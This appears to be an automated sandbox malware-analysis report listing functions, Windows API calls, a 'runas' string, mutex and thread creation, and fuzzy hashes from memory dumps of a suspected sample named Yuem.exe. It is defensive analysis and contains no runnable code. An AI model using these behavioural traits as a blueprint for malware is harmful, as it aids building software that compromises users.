GetProcAddressForCaller.KERNELBASE ref: 00007DF4B6371E9F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
Instruction ID: 0d0486e3db878beaa0c0cc77223db4441d8fbf1b4a8e6bb547751e8e3a7e634f
Opcode Fuzzy Hash: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
Instruction Fuzzy Hash: B1E0C211B08C0D0B6B6861EE24CCA7725D6DBDC13270402BBE41EC3696EC54CC410380

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6362BD4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF4B6362C01

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
Instruction ID: 56ba6a15a890e153f47e60df9097844d547a723bf29487979d29a82ce3034981
Opcode Fuzzy Hash: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
Instruction Fuzzy Hash: 39E04F305089094BEB9CD61DC8497503AE0FB5831AF6042A9D406C9291CB3AD49BCF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638B870 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B638B87A

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 12205ea8074b0c54af7b0ceede77e0325f5c308324c3d42d751b3e8c1284860c
Instruction ID: c9d877055e5af0f41a7fedb14a97236da209e27fa5753ffab4d5a75f7ba4b4ce
Opcode Fuzzy Hash: 12205ea8074b0c54af7b0ceede77e0325f5c308324c3d42d751b3e8c1284860c
Instruction Fuzzy Hash: 06D05E10B15E0E0BAB4867BE1C8916A35E5E7D82327481177F809C2265EC19DC854351

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6371E4C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00007DF4B6371E6E

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: 9150e3db1c79a061e71ca53b58eeabe93240c14c77bcf9667343ba5d1ecead05
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: C8D0A721734D0D1BEA88677D5CD573635D6EBCC271F54217BF40EC2282D968CC550351

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B63814C4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B63814ED

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
Instruction ID: b1eeb26513a92085ab5262efcc9d603a22853855eef6472a38f15cb1e8bd7f39
Opcode Fuzzy Hash: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
Instruction Fuzzy Hash: 39E0EC30519D4A8FEB49BB7898487A536F0FB58318F9405A5C40BC72D1E67CD5C5C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6363810 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6363819

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
Instruction ID: 110cadc8a48401a690fd6dcd4244261adbc0bdbcd80f7f0a40a3525b8e318a71
Opcode Fuzzy Hash: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
Instruction Fuzzy Hash: 8DB0122495BC4F02FE4C33B60F6A0653CA0BF68311FC41164D806C0461F50CC0E8C342

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6371C08 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE ref: 00007DF4B6371C30

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
Instruction ID: a4a6dc6d502823f55364c65a755afcb640eefdf9f565448fbddef45f29eda680
Opcode Fuzzy Hash: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
Instruction Fuzzy Hash: B8119D31B049494BFB689FB8A89DB773AE1FF94621F041177D40FC6156EE2C9904C750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007DF4B638BFA1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
Instruction ID: 5fd85f07ed1ea7bdab0a8e4948fe0c142f4bce46493ac3c5a4957af1fc578ae2
Opcode Fuzzy Hash: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
Instruction Fuzzy Hash: DDB01120EAC800C2C2080E0AB802330F2B0E30B300F0030302082F3A22CAA0CC80808F

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD75700511 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction ID: 9c6f723353de5f7bfac1b68b00d860ec9f8fa9508ac40f659eae0282c9a534f1
Opcode Fuzzy Hash: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction Fuzzy Hash: 26B01132E28A0082E3880E0AB8023B0F2B0C30B300F00B0322008F3220C828CC08028F

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B636ABBE Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a76b3ce062aa2a8694022e39f2cf8a10201159f157325d25f5c49661ee27e0
Instruction ID: c70ab76f8eb2cb21c5c55eeba389027639681abe63233c9de51630a38dfad6b9
Opcode Fuzzy Hash: a8a76b3ce062aa2a8694022e39f2cf8a10201159f157325d25f5c49661ee27e0
Instruction Fuzzy Hash: 59A0029250211999CF10FFD4B707F997334AE84F94B12807CC9412A050F32C9093D210

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Yuem.exePID: 6840, Parent PID: 6736COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.2%
Total number of Nodes:	403
Total number of Limit Nodes:	11

Executed Functions

Function 00CEB385 Relevance: 19.8, APIs: 10, Strings: 1, Instructions: 599
comtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00CEB4D7
CoCreateInstance.OLE32(00D3B330,00000000,00000001,00D3B340,?), ref: 00CEB4F6
CoUninitialize.OLE32 ref: 00CEB504
CoUninitialize.OLE32 ref: 00CEB8D2
CoUninitialize.OLE32 ref: 00CEB8E9
GetLocalTime.KERNEL32(?), ref: 00CEB9E6
CoUninitialize.OLE32 ref: 00CEBABA
CoInitialize.OLE32(00000000), ref: 00CEBB67
CoCreateInstance.OLE32(00D3B330,00000000,00000001,00D3B340,?), ref: 00CEBB83
CoUninitialize.OLE32 ref: 00CEBB91
CoUninitialize.OLE32 ref: 00CEBC50
CoUninitialize.OLE32 ref: 00CEBC64

Strings

@3P, xrefs: 00CEBA31

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance$LocalTime
String ID: @3P
API String ID: 2124445773-282812438
Opcode ID: 6b33863375195ba125ee7f04b908a5754689f2e11168c56e6158778a42c91c8d
Instruction ID: 1c2d51019ea0c0a859930e8a8c8f4e8a12d2104601e825a649ec0f15686ddf90
Opcode Fuzzy Hash: 6b33863375195ba125ee7f04b908a5754689f2e11168c56e6158778a42c91c8d
Instruction Fuzzy Hash: EA329E71A002589FDF18DF29CC89BEE7B75EF45304F508198E409A7291DB75AE84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1797B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00D1797A,?,?,?,?,?,00D189CE), ref: 00D1799D
TerminateProcess.KERNEL32(00000000,?,00D1797A,?,?,?,?,?,00D189CE), ref: 00D179A4
ExitProcess.KERNEL32 ref: 00D179B6

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e94656e33a9566d159e68df805ca284221f6349da45addeb4c74a8f4cb72bc01
Instruction ID: 29d95363b8ae02621c5717e47e5580e8e8e7306073074591c1c2271faf0f6691
Opcode Fuzzy Hash: e94656e33a9566d159e68df805ca284221f6349da45addeb4c74a8f4cb72bc01
Instruction Fuzzy Hash: 84E01231805208AFCB116B14ED089A83B29EB80341B148014F9098A231DB3ADD82CEB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEB2B0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00CEB2FD

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: adcc6a53fac5d9096cf712c811a93cd23b5cf79ce8908e5886f83002ccd1844a
Instruction ID: 1700d7ba5ca6a307e876c474f030cba704c9831fa323b19780d1bc7bacaee419
Opcode Fuzzy Hash: adcc6a53fac5d9096cf712c811a93cd23b5cf79ce8908e5886f83002ccd1844a
Instruction Fuzzy Hash: 6A211AB181016C9FDB2ADF14CD55BEAB7B8FB19704F0042D9A50AA3281D7745B88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D22E9C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D22B55: CreateFileW.KERNELBASE(00000000,00000000,?,00D22F45,?,?,00000000,?,00D22F45,00000000,0000000C), ref: 00D22B72

GetLastError.KERNEL32 ref: 00D22FB0
__dosmaperr.LIBCMT ref: 00D22FB7
GetFileType.KERNELBASE(00000000), ref: 00D22FC3
GetLastError.KERNEL32 ref: 00D22FCD
__dosmaperr.LIBCMT ref: 00D22FD6
CloseHandle.KERNEL32(00000000), ref: 00D22FF6
CloseHandle.KERNEL32(00D1C072), ref: 00D23143
GetLastError.KERNEL32 ref: 00D23175
__dosmaperr.LIBCMT ref: 00D2317C

Strings

H, xrefs: 00D23101

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 71cd2bf0c87a31d73617562e7af8d3b08a024936a3a3e644ab94ee598c2fc872
Instruction ID: fc52f5a7668a3f76f9bb70d9a1402ccabf5a91ef05f7ed2a20a05a7900bb433d
Opcode Fuzzy Hash: 71cd2bf0c87a31d73617562e7af8d3b08a024936a3a3e644ab94ee598c2fc872
Instruction Fuzzy Hash: 52A1F232A04224AFCF199F68EC917BE3BA1EB16324F180159F811EB391DB358956DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CEBB00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 130
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00CEBB67
CoCreateInstance.OLE32(00D3B330,00000000,00000001,00D3B340,?), ref: 00CEBB83
CoUninitialize.OLE32 ref: 00CEBB91
CoUninitialize.OLE32 ref: 00CEBC50
CoUninitialize.OLE32 ref: 00CEBC64

Strings

stoi argument out of range, xrefs: 00CEF3DA
invalid stoi argument, xrefs: 00CEF3E4
, xrefs: 00CEC79A
(, xrefs: 00CEC83B

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: $($invalid stoi argument$stoi argument out of range
API String ID: 1968832861-2618398775
Opcode ID: bfd6883f70c6084292ccddd080361ee5630ea0d9b4f4adc2809c9a292594565a
Instruction ID: f2f6cea0c34aea20daf288853ff302bf178b1150cf0a0c2da77f00326f4b7a88
Opcode Fuzzy Hash: bfd6883f70c6084292ccddd080361ee5630ea0d9b4f4adc2809c9a292594565a
Instruction Fuzzy Hash: AB418F71A00258DFDB04DF6ACC89BBE7BB9EF49714F104119F505EB294DB74A980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE79E0 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 625
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,8C1FD9F5,?,00000000,00D2AE28,000000FF), ref: 00CE7A1C
__Init_thread_footer.LIBCMT ref: 00CE7AA9

Part of subcall function 00CFE51C: EnterCriticalSection.KERNEL32(00D48640,74DF0F00,?,00CE7AAE,00D49578,00D31000), ref: 00CFE526
Part of subcall function 00CFE51C: LeaveCriticalSection.KERNEL32(00D48640,?,00CE7AAE,00D49578,00D31000), ref: 00CFE559
Part of subcall function 00CFE51C: RtlWakeAllConditionVariable.NTDLL ref: 00CFE5D0

CreateThread.KERNEL32(00000000,00000000,00CE7880,00D49530,00000000,00000000), ref: 00CE7B0E
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE7B19

Part of subcall function 00CFE566: EnterCriticalSection.KERNEL32(00D48640,?,74DF0F00,?,00CE7A3D,00D49578), ref: 00CFE571
Part of subcall function 00CFE566: LeaveCriticalSection.KERNEL32(00D48640,?,74DF0F00,?,00CE7A3D,00D49578), ref: 00CFE5AE

Sleep.KERNEL32(000003E8), ref: 00CE7EC9

Strings

runas, xrefs: 00CE7753

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CriticalSection$Sleep$EnterLeave$ConditionCreateInit_thread_footerThreadVariableWake
String ID: runas
API String ID: 3366146113-4000483414
Opcode ID: 1d5687a8709c7238cbcb189a3b8855197f2cc7c24c99b981ff421972bcf82ebe
Instruction ID: a66dac7da70c9a5eb02c039cf9b721203e119e28862f3bb20dad0aa110b83c0b
Opcode Fuzzy Hash: 1d5687a8709c7238cbcb189a3b8855197f2cc7c24c99b981ff421972bcf82ebe
Instruction Fuzzy Hash: 94224971A102889FEF08EF38DD46BAD7B72EF45304F104258F4159B3D6DB359A858BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5EC0 Relevance: 9.3, APIs: 6, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb741e2abb22eeaa77f6261318e1a7e91849fe1043b59d6741ba9d8a0f3224f1
Instruction ID: 45f07f04ebf2f31ae3276aba4f761a9b0548d5bebf62396773277b3a1c7b6670
Opcode Fuzzy Hash: eb741e2abb22eeaa77f6261318e1a7e91849fe1043b59d6741ba9d8a0f3224f1
Instruction Fuzzy Hash: 3BC1D170A1024CDFEF14DF64C845BEEBBB5EB44304F508259F915AB281DB749A84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8180 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,8C1FD9F5), ref: 00CE81FA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE825B
GetProcAddress.KERNEL32(00000000), ref: 00CE8262
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE8323
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE8327

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: 6684592565d3e2e27f11096a795fd44af4939813af5334f44c6b683d087255c3
Instruction ID: b9628e1bdce49664d2b98ad1618e509ffa19b4a2045b8878a7558e50c542cd6d
Opcode Fuzzy Hash: 6684592565d3e2e27f11096a795fd44af4939813af5334f44c6b683d087255c3
Instruction Fuzzy Hash: 5FD10971E00684ABDF14AF29DD463AD7771AB46714F944288E819A73C2DF344F889BE3

Uniqueness

Uniqueness Score: -1.00%

Function 00CF7F90 Relevance: 4.5, APIs: 3, Instructions: 30
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CEAD50: Sleep.KERNELBASE(000003E8), ref: 00CEAD05
Part of subcall function 00CEAD50: CreateMutexA.KERNELBASE(00000000,00000000,00D461D8), ref: 00CEAD23
Part of subcall function 00CEAD50: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00CEAD2C
Part of subcall function 00CEAD50: GetLastError.KERNEL32 ref: 00CEAD32

CreateThread.KERNEL32(00000000,00000000,00CF7EB0,00000000,00000000,00000000), ref: 00CF7F66
CreateThread.KERNEL32(00000000,00000000,00CF7F40,00000000,00000000,00000000), ref: 00CF7F77
Sleep.KERNEL32(00007530), ref: 00CF7F85

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Create$SleepThread$ErrorLastMutexObjectSingleWait
String ID:
API String ID: 3813583481-0
Opcode ID: edf0836fa8dc7374f86ba98e77821576859989fadc083df5a695eedda935e4ba
Instruction ID: ac91618908fa5ef1eca412ae2162d1ee3ad84d0346b8a8d6901a21a51b133cb6
Opcode Fuzzy Hash: edf0836fa8dc7374f86ba98e77821576859989fadc083df5a695eedda935e4ba
Instruction Fuzzy Hash: 1DE01231BEC71836F2B437E64C03F6A29060B04F11F200252B7497E2D159C03A0066BF

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE5C0 Relevance: 3.3, APIs: 2, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CEE803
CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00CEE91F

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFileModuleName
String ID:
API String ID: 3341437400-0
